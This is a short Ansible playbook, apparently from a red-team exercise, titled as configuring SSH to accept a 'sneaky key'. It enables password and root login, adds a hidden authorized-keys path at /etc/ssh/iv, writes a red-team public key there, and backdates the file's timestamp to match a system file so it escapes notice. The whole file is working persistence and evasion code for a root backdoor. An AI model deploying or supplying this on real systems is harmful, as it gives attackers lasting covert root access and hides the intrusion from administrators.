- name: Configure ssh to accept a sneaky key
  hosts: LinuxRoot
  tasks:
  - name: Reconfigure SSH and write key file
    ansible.legacy.shell: |
      # Allow password based login, even for root, because, why not.
      sed -i 's/^PasswordAuthentication .*$/PasswordAuthentication yes/' /etc/ssh/sshd_config
      sed -i 's/^#PermitRootLogin .*$/PermitRootLogin yes/' /etc/ssh/sshd_config

      # Add /etc/sshd/iv as a valid location for authorized keys
      sed -i 's/^.*AuthorizedKeysFile.*$/AuthorizedKeysFile \/etc\/ssh\/iv \/root\/.ssh\/authorized_keys \/home\/%u\/.ssh\/authorized_keys/' /etc/ssh/sshd_config

      # Write the redteam pubkey to /etc/ssh/iv
      echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII8MC+aXwkJNbcvu5aIQ/iXcvcvwl9y3eYE+TntYvhBc' > /etc/ssh/iv
      chown root.root /etc/ssh/iv
      chmod 644 /etc/ssh/iv
      touch -r /etc/ssh/moduli /etc/ssh/iv
      systemctl restart sshd
    args:
      executable: /bin/bash
      creates: /etc/ssh/iv
